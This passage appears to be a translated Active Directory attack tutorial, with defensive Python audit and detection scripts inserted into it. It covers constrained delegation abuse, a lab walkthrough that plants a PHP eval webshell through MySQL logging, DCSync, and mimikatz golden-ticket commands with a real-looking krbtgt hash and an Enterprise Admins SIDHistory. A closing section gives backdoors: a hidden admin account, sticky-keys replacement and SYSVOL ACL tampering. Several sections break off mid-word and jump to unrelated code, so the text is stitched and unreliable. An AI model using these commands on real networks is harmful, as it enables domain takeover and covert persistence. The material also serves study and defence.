2. Through the S4U2Self extension, service1 requests ST1 from the KDC, in the user's name, for access to service1.
3. The KDC returns ST1 to service1, a ticket for the user to service1 that may contain the user's authorization data.
4. service1 can use the authorization data in the ST to satisfy the user's request and then responds to the user.

Note: although S4U2Self gives service1 information about the user, it does not let service1 make requests to other services on behalf of the user. That is where S4U2Proxy comes in.

5. The user makes a request to service1, which needs to access resources on service2 as the user.
6. service1 requests from the KDC, in the user's name, ST2 for the user to access service2.
7. If the request contains a PAC, the KDC verifies the PAC by checking its signature data. If the PAC is valid or absent, the KDC returns ST2 to service1, but the client identity stored in the cname and crealm fields of ST2 is the user's, not service1's.
8. service1 uses ST2 to send a request to service2 in the user's name, and service2 determines that the user has been authenticated by the KDC.
9. service2 responds to the request in step 8.
10. service1 responds to the user's request in step 5.

When an account is set to constrained delegation, its userAccountControl contains TRUSTED_TO_AUTH_FOR_DELEGATION (T2A4D), and its msDS-AllowedToDelegateTo attribute records the services it is allowed to delegate to.

From this we can see that constrained delegation does not require any active request from the user being impersonated. Once you control an account configured with constrained delegation, you can gain access to the hosts that the delegation is configured for.

3.2 Practice

3.2.1 Finding constrained delegation

3.2.1.1 adfind

Query hosts with constrained delegation:
AdFind.exe -b 'DC=pentest,DC=com' -f '(&(samAccountType=805306369)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto

Query users with constrained delegation:
AdFind.exe -b 'DC=pentest,DC=com' -f '(&(samAccountType=805306368)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto

3.2.1.2 powerview

Query hosts with constrained delegation:
Get-DomainComputer -TrustedToAuth -Domain test.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto

Query users with constrained delegation:
Get-DomainUser -TrustedToAuth -Domain qiyou.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto | fl

3.2.1.3 ldapsearch

Query machines with constrained delegation:
ldapsearch -LLL -x -H ldap://IP:389 -D '[email protected]' -w '123456' -b dc=pentest,dc=com '(&(samAccountType=805306369)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto

Query users with constrained delegation:
ldapsearch -LLL -x -H ldap://IP:389 -D '[email protected]' -w '123456' -b dc=pentest,dc=com '(&(samAccountType=805306368)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto

3.2.2 Exploiting constrained delegation

3.2.2.1 Common case

With constrained delegation, the service account can only obtain the ST of a particular service for a given user or host, can only use the impersonated user to access that specific service, and cannot obtain the user's TGT. If the plaintext password or hash of the account that has constrained delegation enabled can be obtained, an S4U request can be forged, and the service account can then be used to obtain an ST to the service with the permissions of any account.

First dump the NTLM hash of the machine account:
mimikatz.exe 'privilege::debug' 'sek
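The two discovery sections above boil down to reading userAccountControl bits and msDS-AllowedToDelegateTo. The following is an added audit example, not code from the original post: it classifies constructed LDAP-style records by delegation type and lists privileged users that lack the "cannot be delegated" flag. Account names, SPNs and the admin-name set are assumptions; the bit values are the documented userAccountControl constants (524288 is the bit the post's LDAP filters match).

```python
"""Audit Kerberos delegation settings on AD accounts (added example, not the post's code)."""
from dataclasses import dataclass, field
from typing import List, Optional, Set

# userAccountControl bits (documented ADS_UF_* values)
TRUSTED_FOR_DELEGATION = 0x80000            # 524288: unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # T2A4D: constrained delegation with protocol transition
SERVER_TRUST_ACCOUNT = 0x2000               # machine account of a domain controller
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"

SAM_USER_OBJECT = 805306368      # samAccountType of user accounts
SAM_MACHINE_ACCOUNT = 805306369  # samAccountType of computer accounts


@dataclass
class Account:
    name: str
    sam_account_type: int
    uac: int
    allowed_to_delegate_to: List[str] = field(default_factory=list)  # msDS-AllowedToDelegateTo


@dataclass
class Finding:
    account: str
    kind: str
    severity: str
    detail: str


def classify(acct: Account) -> Optional[Finding]:
    """Describe the delegation configured on one account; None when none is configured."""
    if acct.uac & TRUSTED_FOR_DELEGATION:
        if acct.uac & SERVER_TRUST_ACCOUNT:
            # Domain controllers are unconstrained by default: expected, but worth listing.
            return Finding(acct.name, "unconstrained", "info", "domain controller (default)")
        who = "computer" if acct.sam_account_type == SAM_MACHINE_ACCOUNT else "user"
        return Finding(acct.name, "unconstrained", "high",
                       f"{who} account keeps a copy of every caller's TGT")
    if acct.allowed_to_delegate_to:
        targets = ", ".join(acct.allowed_to_delegate_to)
        if acct.uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            # With protocol transition, S4U2Self needs no involvement from the impersonated user.
            return Finding(acct.name, "constrained+protocol-transition", "medium",
                           f"can impersonate any non-protected user to: {targets}")
        return Finding(acct.name, "constrained", "low", f"delegates only to: {targets}")
    return None


def audit(accounts: List[Account]) -> List[Finding]:
    """All delegation findings, most severe first."""
    order = {"high": 0, "medium": 1, "low": 2, "info": 3}
    findings = [f for f in map(classify, accounts) if f is not None]
    return sorted(findings, key=lambda f: order[f.severity])


def unprotected_admins(accounts: List[Account], admin_names: Set[str]) -> List[str]:
    """Privileged users that the hosts above could impersonate because NOT_DELEGATED is unset."""
    return [a.name for a in accounts
            if a.name in admin_names and not a.uac & NOT_DELEGATED]


# Constructed sample directory (names and SPNs are made up for this example).
SAMPLE = [
    Account("DC01$", SAM_MACHINE_ACCOUNT, 0x2000 | 0x80000),      # DC, unconstrained by default
    Account("WIN7$", SAM_MACHINE_ACCOUNT, 0x1000 | 0x80000),      # workstation, unconstrained
    Account("svc_web", SAM_USER_OBJECT, 0x200 | 0x1000000,        # constrained + T2A4D
            ["cifs/fileserver.pentest.com"]),
    Account("APP01$", SAM_MACHINE_ACCOUNT, 0x1000,                # plain constrained
            ["http/web.pentest.com"]),
    Account("administrator", SAM_USER_OBJECT, 0x200),             # delegatable admin
    Account("da2", SAM_USER_OBJECT, 0x200 | 0x100000),            # admin marked NOT_DELEGATED
]

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"[{f.severity:6}] {f.account:14} {f.kind}: {f.detail}")
    print("admins without NOT_DELEGATED:", unprotected_admins(SAMPLE, {"administrator", "da2"}))
```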
6. VulnStack ATT&CK 1 range

Environment

Information gathering

Port scanning: only 80 and 3306 are open.

Directory scanning: accessing port 80 shows that the home page is a PHP probe. A directory scan finds phpmyadmin.

Vulnerability discovery

phpmyadmin: trying to log in with root:root succeeds.

There are many ways to get a shell from the phpMyAdmin backend. First look at the usual select ... into outfile: here secure_file_priv is NULL, so writing files is not allowed. Abandon this method and try writing the webshell through the MySQL general_log instead. First check the global variable configuration with show global variables like '%general%': the general log is not enabled, so enable it and set the log file path:
SET GLOBAL general_log='ON'
SET GLOBAL general_log_file='C:/phpStudy/WWW/shell.php'

The absolute path comes from the probe page found earlier. Then write the webshell with select '<?php @eval($_POST["bbll"]);?>'; and connect with AntSword.

Internal network penetration

First check whether the system is 32- or 64-bit:
wmic cpu get addresswidth

Use CS to generate a trojan, upload it and execute it. The beacon comes online directly with administrator privileges. Then: view user privileges, check the current logon domain, view the users in the domain, view the hosts in the domain, view the domain, and dump passwords.

Lateral movement

After the DC is online, use hashdump to dump the krbtgt NTLM hash and create a golden ticket.
7. DCSync attack

In August 2015, Benjamin Delpy (the author of Mimikatz) and Vincent Le Toux released a new version of Mimikatz that added the DCSync feature. It imitates a domain controller and requests data, such as account password hashes, from a real domain controller. Before DCSync, you had to log on to the domain controller and run code there to obtain this data. The biggest feature of DCSync is that it obtains the desired password information remotely through the domain's synchronous replication, without logging on to the domain controller. Note that if the target of DCSync is a read-only domain controller (RODC) it will fail, because an RODC cannot participate in replication.

Principle

The principle of DCSync is straightforward: it uses the data replication between domain controllers. Discover the target domain controller on the network, then request replication through the Directory Replication Service (DRS) Remote Protocol. The Samba wiki describes GetNCChanges as follows: when a DC (acting as the client DC) wants to get data from another DC (the server DC), the client DC sends a GetNCChanges request to the server DC. The response contains the data that needs to be synchronized; if there is a lot of data, the exchange is repeated, because each response carries only a limited amount.

Prerequisites

To launch a DCSync attack, a user must hold the following rights:
1. Replicating Directory Changes (DS-Replication-Get-Changes)
2. Replicating Directory Changes All (DS-Replication-Get-Changes-All)
3. Replicating Directory Changes In Filtered Set

By default, the domain administrators group has these rights.

Attack

Defense

DCSync works by imitating the synchronous replication that domain controllers initiate among themselves, so the best defense is a whitelist of domain controllers.
In a domain, the number of domain controllers and their IP and MAC addresses are well-known assets; put them on a whitelist that is allowed to replicate, and deny replication from non-whitelisted IPs.

Script to obtain the IPs of all domain controllers:
PowerShell: Get-ADDomainController -filter * | select IPv4Address
or
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers | select IPAddress

Then detect replication of domain controller data from outside the whitelist on the network devices.
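The whitelist defense above can be turned into a detection rule: replication rights exercised by anyone other than a known DC, or from an address that is not a DC, are the signal. The following is an added example, not the post's code; the events are constructed in the shape of Windows event 4662 (the IpAddress field assumes the collector joined the logon session's source address), and the DC names and IPs are assumptions. The three GUIDs are the documented control access rights listed in the prerequisites.

```python
"""Flag directory replication requests that do not come from a known DC (added example)."""
from typing import Dict, Iterable, List

# Control-access-right GUIDs that appear in the Properties field of event 4662
REPLICATION_RIGHTS: Dict[str, str] = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Whitelist in the spirit of the post: DC machine accounts and their IPs (constructed values).
DC_ACCOUNTS = {"DC01$", "DC02$"}
DC_IPS = {"10.0.0.10", "10.0.0.11"}


def replication_rights(properties: str) -> List[str]:
    """Names of the replication rights referenced in a 4662 Properties string."""
    lowered = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in lowered]


def is_alert(event: dict) -> bool:
    """True when a replication right is used by a non-DC principal or from a non-DC address."""
    if event.get("EventID") != 4662 or not replication_rights(event.get("Properties", "")):
        return False
    if event.get("SubjectUserName", "") not in DC_ACCOUNTS:
        return True  # a user or unknown computer account is pulling replication data
    src = event.get("IpAddress")
    return src is not None and src not in DC_IPS  # a DC name used from a non-DC address


def detect(events: Iterable[dict]) -> List[str]:
    """One alert line per suspicious replication request."""
    alerts = []
    for e in events:
        if is_alert(e):
            rights = ", ".join(replication_rights(e["Properties"]))
            alerts.append(f"{e['TimeCreated']} {e['SubjectUserName']}@{e.get('IpAddress', '?')} "
                          f"requested {rights} on {e['ObjectName']}")
    return alerts


# Constructed events, not real logs. The last GUID is a placeholder for a non-replication right.
SAMPLE_EVENTS = [
    {"TimeCreated": "2021-03-01T09:00:01", "EventID": 4662, "SubjectUserName": "DC02$",
     "IpAddress": "10.0.0.11", "ObjectName": "DC=pentest,DC=com",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"TimeCreated": "2021-03-01T09:00:05", "EventID": 4662, "SubjectUserName": "jsmith",
     "IpAddress": "10.0.5.23", "ObjectName": "DC=pentest,DC=com",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"TimeCreated": "2021-03-01T09:00:09", "EventID": 4662, "SubjectUserName": "DC01$",
     "IpAddress": "10.0.5.24", "ObjectName": "DC=pentest,DC=com",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"TimeCreated": "2021-03-01T09:00:12", "EventID": 4662, "SubjectUserName": "jsmith",
     "IpAddress": "10.0.5.23", "ObjectName": "CN=jsmith,CN=Users,DC=pentest,DC=com",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},
]

if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print("ALERT", line)
```

Legitimate DC-to-DC replication (first event) stays quiet; a user account pulling replication data and a DC account used from a workstation address both alert.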
8. Domain attacks based on domain trust relationships

Domain trust

Trust relationships between domains are established so that users of one domain can conveniently access resources in another, and to simplify management and maintenance of the domain network. While this model brings convenience, it also offers many places that a malicious attacker can exploit.

Domain trust relationships can be one-way or two-way, transitive or non-transitive, internal or external, cross-link (shortcut) trusts, and so on. For example, a one-way transitive external trust may exist between two domains. Trust relationships between domains of the same forest are generally implicit two-way transitive internal trusts.

Deployment: the parent-child trust is the most common domain trust. When a new domain is added to an existing forest, the most common patterns are the child domain (Parent-Child) and tree root (Tree-Root) modes. These establish a parent-child trust or a tree-root trust respectively, both of which are two-way transitive internal trusts.

A cross-link trust is a direct trust established between two sub-domains of the same forest. Within a forest, domains are organized as a tree; to get from one sub-domain to another, authentication has to walk up from the sub-domain's branch to the forest root and then down to the other sub-domain. A cross-link trust is a shortcut between the two sub-domains that reduces the time and number of steps for authentication and authorization.

Internal trust refers to trust between domains inside the forest; correspondingly, external domain trust refers to trust between a domain and a domain outside the forest.
There is also MIT trust (the Kerberos protocol and standard were proposed by MIT), which is a trust between a Windows domain and a non-Windows realm. Because it is rarely used, this article does not discuss it.

Cross-domain authentication and resource access authorization

When a trust relationship is established between two domains, a shared inter-realm key (IRKey) is created, which plays the same role as Krbtgt. The difference is that the IRKey is used for authentication between the two trusting domains, whereas Krbtgt is used for authentication between the AC and the KDC of the same domain. Authentication and authorization across trusting domains is roughly similar to the process inside one domain, but there are still many differences:

1. Jack sends an authentication request to DC1, with the data encrypted using the NTLM hash of Jack's password;
2. DC1 verifies the received request with Jack's NTLM hash and returns an authenticated TGT to Jack;
3. Jack uses the TGT to send an authorization request to DC1, a TGS_REQ for access to the file service in DC2;
4. DC1 finds that the file service is in DC2 and returns a referral TGT, indicating that the request must be transferred to DC2; the authentication information in the referral TGT is encrypted with the IRKey;
5. After receiving the referral TGT, Jack follows the referral and uses it to send a TGS_REQ to DC2 for the file service;
6. DC2 receives the request, verifies the authentication information in the TGT with the IRKey, and returns a TGS ticket permitting access to the file service. Part of the ticket is encrypted with the NTLM hash of the service account that runs the file service;
7. Jack uses the received TGS ticket to access the file service in DC2;
8. The file service's service account verifies the TGS with its own NTLM hash.

When a trust relationship is established between two domains, the other side's SPNs, DNS records and similar information are stored in the global catalog for easy lookup. In the figure above, for example, DC1 stores all the service SPNs, DNS records and so on of DC2. If the service Jack requests is in DC1's global catalog, the referral TGT is returned. If it is not, and DC1 has a parent domain, DC1 asks the parent domain, and so on up to the forest root domain server. If DC1 is itself the root (as in this case), it tells Jack directly that the requested service does not exist. A forest has only one global catalog.

SIDHistory version of the cross-domain golden ticket

In a domain, once we obtain the NTLM hash of Krbtgt we can construct a golden ticket that forges any user in the domain, including administrators, and gives full control of the domain. But in a different domain of the same forest, the golden ticket is no longer valid. Recall the main elements of a golden ticket: the domain name, the domain SID (Security Identifier), the NTLM hash of the Krbtgt password, and the user RID (Relative Identifier; unless specified otherwise, Mimikatz sets the RID to that of the domain administrator). Different domains have different Krbtgt accounts, so a golden ticket fails across domains.

mimikatz.exe 'kerberos::golden /user:anyusername /domain:lab.adsec.com /sid:S-1-5-21-2732272027-1570987391-2638982533 /krbtgt:16ed27ee7848756cfa96b33c25e3ad3d /ptt' exit
It can be seen that a golden ticket constructed for the lab.adsec.com domain is valid in that domain but invalid in the parent domain adsec.com.

If a user's SIDHistory attribute is set to the SID of a high-privileged group or user, the user also has permissions equivalent to that group or user. If we add the SID of the target domain's domain administrators group into the forged golden ticket, we obtain domain administrator rights in the target domain. Combining the golden ticket with SIDHistory gives a cross-domain golden ticket. Since each domain's SID is different, a golden ticket with SIDHistory is not universal.

According to Microsoft's description, within a forest the Enterprise Admins (EA) group is automatically added to the domain administrators group of every domain in the forest, and EA exists only in the root domain, so the SID of EA is fixed: the root domain SID plus a fixed RID, 519. Therefore, if the SIDHistory attribute is set to the SID of EA and combined with the golden ticket, a cross-domain golden ticket valid for all domains in the forest can be built from nothing more than the NTLM hash of any one domain's krbtgt account. This ticket can be called the SIDHistory version of the golden ticket. Of course, the domain administrators group SID of a specific domain in the forest can also be added to SIDHistory, but such a golden ticket is only valid for that domain and not for others; it is not as universal as using the Enterprise Admins SID.
mimikatz.exe 'kerberos::golden /user:anyusername /sids:[sid for EA group] /sid:[sid for lab.adsec.com domain] /domain:lab.adsec.com /krbtgt:16ed27ee7848756cfa96b33c25e3ad3d /ptt' exit

The golden ticket is still constructed in the lab.adsec.com domain, but the /sids parameter is added with the root domain's Enterprise Admins SID as its value. This is the SIDHistory version of the golden ticket, valid in both the lab.adsec.com and adsec.com domains.

Note that the SIDHistory version of the golden ticket relies on trust inside the forest: outside an intra-forest trust, SIDHistory is filtered out by Microsoft's SID filtering rules and becomes ineffective, whereas there is no SID filtering within the forest. This is why the forest, rather than the domain, is said to be the security boundary.

IRKey version of the cross-domain golden ticket

When a trust relationship is established between two domains, a shared inter-realm key (IRKey) is created. Its function is equivalent to Krbtgt, but it is used between two trusting domains, whereas Krbtgt is used between the AC and the KDC of the same domain.

As long as the NTLM hash of the krbtgt account of any domain in the forest is obtained, control of all domains in the forest can be obtained through the SIDHistory version of the golden ticket. Therefore, to defend, the password of the krbtgt account of every domain in the forest must be changed twice. In a multi-domain environment the IRKey behaves like a machine account password: the system rotates it automatically every 30 days by default. So even if the krbtgt NTLM hash of every domain in the forest is changed twice, the IRKey's NTLM hash most likely does not change (it is unlikely that the krbtgt change happens to coincide with the IRKey rotation cycle).
Similar to a silver ticket, the IRKey can be used to forge an inter-realm referral TGT to obtain domain administrator rights in the target domain, and then, combined with the SIDHistory version of the golden ticket from the previous section, control of the whole forest can be regained. Note that the SID here is the SID of the target domain.

In a domain, most accounts ending in '$' are computer accounts, but accounts ending in '$' in the Users group are trust accounts. All user accounts ending in '$' can be listed with the PowerShell command Get-ADUser that ships with the domain server. In the figure below, the ADSEC$ account is a trust account and belongs to the Users group. There are two ways to obtain the NTLM hash of a trust account.

Obtaining the trust account's NTLM hash with DCSync

The figure below uses DCSync to obtain the NTLM hash of the trust account adsec$ in the lab.adsec.com domain. The result shows that the account type is TRUST_ACCOUNT.

Obtaining the trust account's NTLM hash with lsadump

Use lsadump::trust /patch. The figure below shows two different NTLM values, [IN] LAB.ADSEC.COM - ADSEC.COM and [OUT] ADSEC.COM - LAB.ADSEC.COM, which are the keys used when accessing other domains from this domain and when accessing this domain from other domains. Because a two-way trust is really two superimposed one-way trusts, there are two keys. Here we want to construct the IRKey version of the golden ticket from this domain to access other domains inside the forest, so the IN value is used.

Since IRKeys exist both between trusting domains inside a forest and between forests, they can be used for referral authentication in both cases. The SIDHistory version of the golden ticket cannot be used between forests because of the SID filtering rule, but the IRKey version does not involve this filtering and remains valid. The IRKey version of the golden ticket therefore comes in two forms, inside the forest and outside the forest.
The procedure is similar for both; here we focus on the IRKey version inside the forest. Authentication of the inter-realm referral ticket relies on IRKey encryption, so once the IRKey is known, any user of the trusting domain can be forged. In the test, we construct a ticket telling the adsec.com domain that the referred, authenticated user is the administrator, with SIDHistory set to the root domain's Enterprise Admins. After construction succeeds, we have administrator rights in adsec.com, but cannot access lab.adsec.com with high privileges, because the constructed ticket is an administrator ticket for the adsec.com domain. After obtaining high privileges in adsec.com, the NTLM hash of that domain's krbtgt account can be obtained, and on that basis the SIDHistory version of the golden ticket can be constructed to control the whole forest.

Obtaining domain trust relationships

In large domain networks, the organizational model and trust relationships differ for many reasons such as mergers and acquisitions, restructuring and business expansion. These trust relationships are stored in the forest root domain's database (Global Catalog), and there are many ways to obtain them. PowerView and BloodHound provide several ways to obtain and visualize domain trust relationships. The following describes how to obtain the trust relationships of the whole forest from a host in a sub-domain of the forest.

PowerView: first use Get-NetForestTrust to obtain forest-level trust relationships. There are two forests, adsec.com and testlab.com, with a two-way trust between them.
Use Get-NetDomainTrust to obtain the domain-level trusts of adsec.com, that is, the relationships inside the forest: a ParentChild trust to lab.adsec.com and a TreeRoot trust to the res.com domain. In the test, the adsec.com parameter of Get-NetDomainTrust specifies the domain to query; generally, as long as the specified domain trusts the domain of the querying host, the other side's trust data can be obtained. The output can be converted to CSV with Export-CSV -NoTypeInformation, for example Get-DomainTrustMapping -API | Export-CSV -NoTypeInformation trusts-mapping.csv, then processed with the TrustVisualizer tool and finally rendered as a graph with yEd.

Cross-domain attacks using domain trust

If a user in one domain (call the user eviluser) wants to access resources in another domain, first make sure the target domain trusts the domain the current user is in. That is the basic premise; then one of the following three conditions must hold:
1. eviluser has been added to a group in the target domain that has resource access permissions there;
2. eviluser has been added to a local group on some host or server in the target domain, for example to the local administrators group of a server;
3. The current user has been added as a security principal in the access control ACL of some domain object in the target domain, so that, for example, the password of a domain user object can be modified.

Some may wonder: according to the previous introduction, since obtaining the NTLM hash of the current domain's Krbtgt account or IRKey gives control of the entire forest, why introduce cross-domain attacks inside the forest at all?
This is because in practice it is not always possible to obtain the Krbtgt or IRKey NTLM hash of a given domain, for instance because the domain has few resources, strict configuration or timely patching. In that case one has to detour into a larger domain, which offers more chances to obtain those hashes, because the more resources there are, the higher the probability of a weakness.

To attack domain A from the current user eviluser, the user must first have permission to access domain A's resources across domains, so the attack process includes the following steps:
1. From the current domain's database, enumerate which domains trust the current domain (out). Since other domains are the targets, there is no need to care which external domains are trusted by (in) the current domain. This is easily obtained with the method of the previous section.
2. Using the trust relationships, enumerate which groups in the target domain contain users of foreign domains. There are usually three kinds of groups in a domain: Domain Local Groups, which can contain members from other domains and forests and are the most common; Global Groups, which allow no cross-domain members even within the same forest and carry higher authority, such as the Enterprise Admins group; and Universal Groups, which can contain any member of the forest but no cross-forest members. In cross-domain attacks inside the forest we only care about the first and third kinds. A user's memberOf attribute is computed from the group's member attribute, provided that the group's member attribute has been replicated to the Global Catalog. If a user is added to a universal group by another domain in the forest, the universal group replicates its member attribute to the forest's Global Catalog and the user's memberOf attribute is updated by this computation. When a user is added to a domain local group by another domain in the forest, the domain local group does not replicate its member attribute to the Global Catalog, so the user's memberOf attribute is not updated. Therefore, even with permission to query the forest's Global Catalog, we only see memberships in universal groups of other domains; to obtain memberships in the local groups of other domains, every domain has to be polled one by one.
3. Enumerate the local groups of hosts and servers in the target domain and see which foreign users have been added to them. This can be done through GPO group policy, or by probing host by host with PowerView; BloodHound automates all of these checks.
4. Enumerate the ACLs of objects in the target domain and check whether any domain object's ACL contains foreign-domain users. Generally, any user can view the ACLs of all domain objects, and these ACLs are stored in the global database, so they are easy to enumerate; PowerView's Get-DomainObjectACL command does this.
5. Filter the users found in steps 2, 3 and 4 a second time, selecting those that belong to the current domain as targets for an in-domain attack, such as obtaining the target user's NTLM hash or TGT with the usual intra-domain methods.
6. Use the NTLM hash or TGT obtained in the previous step to access the target domain, enter it, and then attack to obtain the NTLM hash of the target domain's Krbtgt account or IRKey.
If conditions are not yet ripe, repeat the steps above, gradually entering more domains to look for opportunities.

When a user is added to a group by a domain in an external forest, it appears in the CN=ForeignSecurityPrincipals,DC=domain,DC=com container of the external target domain, which is the user's representative or alias in the external domain; all foreign users in the domain have the same SID, which is the effect of the cross-forest SID filtering mechanism. So by enumerating ForeignSecurityPrincipals one can learn which users have access to this external forest; call this result set ExternalUsers. Next, check whether it includes users of our current domain. If so, attack those users directly to obtain NTLM hashes or TGTs and thereby gain resource access in the external forest's domain. If not, check whether ExternalUsers includes users of our current forest; call this set InternalUsers. Look up the domains of InternalUsers in the current forest, attack those domains with the intra-forest cross-domain method to gain entry, and then attack the InternalUsers from those domains to gain resource access in the external domain. This is a bypass attack.

SID filtering mechanism

Microsoft claims that the forest is the security boundary of Active Directory, yet cross-forest attacks appeared as early as 2005. First, what SIDHistory and SID filtering are:

SIDHistory

SIDHistory (the ExtraSids field in the PAC structure) exists to ease user migration between domains. When a user migrates to a new domain, the original SID and some group SIDs can be added to the SIDHistory attribute of the new user in the new domain.
When this new user accesses a resource, access is denied or allowed based on matching the SID or SIDHistory against the resource's ACL. SIDHistory is therefore equivalent to holding one or more extra group memberships, and expands permissions.

In a cross-domain trust within the same forest, the SIDHistory attribute is not filtered by the SID filtering mechanism. If the SIDHistory attribute in a sub-domain has the Enterprise Admins SID added (the enterprise administrator is necessarily the forest administrator), the sub-domain gains forest administrator authority and its permissions are expanded, which is why SIDHistory was later made a protected attribute. In a cross-forest trust, SIDHistory is filtered by the SID filtering mechanism and no longer has this privileged property. This is one of the reasons the forest is the security boundary of Active Directory.

SID filtering mechanism

When a user's TGT is forwarded to a new domain through a domain trust, the PAC (Privilege Attribute Certificate) in the TGT contains the user's SID and SIDHisto
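A small model of the boundary described in the SIDHistory golden ticket section and in the SID filtering section above, as an added example that is not part of the original post: inside a forest the PAC's extra SIDs pass unfiltered, so an Enterprise Admins SID (root domain SID plus RID 519) is honoured in every domain; across a forest trust, SID filtering drops any SID that does not belong to the trusted forest. The root and testlab domain SIDs and the RID 500 user are constructed; this is a simplification of the Windows filtering algorithm, not a reimplementation of it.

```python
"""Model of SIDHistory (ExtraSids) handling at a trust boundary (added example, not the post's code)."""
from typing import List, Set, Tuple

ENTERPRISE_ADMINS_RID = 519  # fixed RID of Enterprise Admins in the forest root domain
DOMAIN_ADMINS_RID = 512


def domain_of(sid: str) -> str:
    """Domain part of a SID: everything before the final RID."""
    return sid.rsplit("-", 1)[0]


def rid_of(sid: str) -> int:
    return int(sid.rsplit("-", 1)[1])


def filter_sids(sids: List[str], trusted_forest_domains: Set[str], intra_forest: bool) -> List[str]:
    """SIDs the receiving DC keeps from an incoming referral ticket's PAC.

    intra_forest=True: nothing is filtered (the post's point about forest-internal trusts).
    intra_forest=False: cross-forest trust; only SIDs whose domain belongs to the trusted
    forest survive, so an injected SID from the receiving forest is dropped.
    """
    if intra_forest:
        return list(sids)
    return [s for s in sids if domain_of(s) in trusted_forest_domains]


def grants_enterprise_admin(kept_sids: List[str], root_domain_sid: str) -> bool:
    """Does the PAC that survived filtering carry the root domain's Enterprise Admins SID?"""
    return f"{root_domain_sid}-{ENTERPRISE_ADMINS_RID}" in kept_sids


def golden_ticket_sids(user_domain_sid: str, user_rid: int, extra_sids: List[str]) -> List[str]:
    """PAC SIDs of a forged ticket: the user, that domain's Domain Admins, plus SIDHistory (/sids)."""
    return [f"{user_domain_sid}-{user_rid}", f"{user_domain_sid}-{DOMAIN_ADMINS_RID}", *extra_sids]


def evaluate(user_domain_sid: str, extra_sids: List[str], trusted_forest_domains: Set[str],
             intra_forest: bool, root_domain_sid: str) -> Tuple[List[str], bool]:
    """Kept SIDs and whether the ticket ends up with Enterprise Admins rights in the receiving forest."""
    ticket = golden_ticket_sids(user_domain_sid, 500, extra_sids)  # RID 500: built-in Administrator
    kept = filter_sids(ticket, trusted_forest_domains, intra_forest)
    return kept, grants_enterprise_admin(kept, root_domain_sid)


# Constructed forest layout: adsec.com (root) with child lab.adsec.com; testlab.com is a separate forest.
ROOT = "S-1-5-21-1000000001-1000000002-1000000003"          # adsec.com (constructed)
CHILD = "S-1-5-21-2732272027-1570987391-2638982533"         # lab.adsec.com (SID from the post)
OTHER_FOREST = "S-1-5-21-3000000001-3000000002-3000000003"  # testlab.com (constructed)
ADSEC_FOREST = {ROOT, CHILD}
EA_SID = f"{ROOT}-{ENTERPRISE_ADMINS_RID}"

if __name__ == "__main__":
    # Child domain ticket with the root's EA SID in SIDHistory, presented inside the forest.
    kept, ea = evaluate(CHILD, [EA_SID], ADSEC_FOREST, intra_forest=True, root_domain_sid=ROOT)
    print("intra-forest:", kept, "-> enterprise admin:", ea)
    # Same trick from the other forest: the foreign EA SID is filtered at the forest boundary.
    kept, ea = evaluate(OTHER_FOREST, [EA_SID], {OTHER_FOREST}, intra_forest=False, root_domain_sid=ROOT)
    print("cross-forest:", kept, "-> enterprise admin:", ea)
```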
9. Covert domain backdoors

Common backdoor methods: hidden user, hidden program, sticky keys.

Hidden user

net user yincang$ 123456qaq /add
net localgroup administrators yincang$ /add

Hidden program

NtGodMode: with NtGodMode.exe ("God mode"), no matter how the administrator changes the password, the system can be logged into with any password.
https://blog.csdn.net/oceanark/article/details/51902042
https://www.jb51.net/article/14702.htm
https://www.52pojie.cn/forum.php?mod=viewthreadtid=19817page=1

Named pipes

Named Pipe: \Server\PipeName\Path. IP + port is the usual remote connection method; named pipes need no dedicated port and blend into port 135, allowing logon without opening a port.

Sticky keys

Pressing the Shift key five times in a row pops up the sticky keys prompt; replacing it with cmd yields a shell.

Covert backdoors inside the domain

Directory ACL

A deeply hidden backdoor based on the ACL (access control list) of in-domain objects. In a domain network, the domain group policies and scripts are stored in the SYSVOL directory of the domain controller. All domain users can read it freely, but only certain high-privileged users can modify it. When a domain account logs on, it queries and executes (if anything has changed) its own domain policy and logon scripts. To a certain extent, whoever controls the SYSVOL directory has a high probability of controlling the domain network. If logon audit software is deployed in the domain, the logon and use of high-privileged accounts is strictly audited, so controlling the domain network through high-privileged users is not very covert. Generally, domain policy forces periodic password changes for high-privileged users, but this requirement may not exist for low-privileged users, and many domain users are rarely logged on and used.
If a low-privileged user has modify permission on the SYSVOL directory, the audit software will not notice it logging on to the domain, because its privileges are not high; and protection and monitoring software pays little attention to directory ACLs, so this is a very practical hidden backdoor.

Log on to the Windows 7 domain client as the ordinary user eviluser. Connecting to the domain controller with net use shows the directory shared by the server, but there is no write permission. Write permission (or full control) on the Policies directory is then added for eviluser through the resource manager and inherited by all subdirectories and files: in the Security tab of the Policies directory, eviluser appears as an individual permission entry, whereas normally ordinary users only have the permissions of the Authenticated Users group. After the directory ACL on the server is set, within the original IPC connection the ordinary domain user eviluser can write data to the Policies directory, proving write permission, and can therefore modify the policies and scripts inside it: a hidden backdoor.

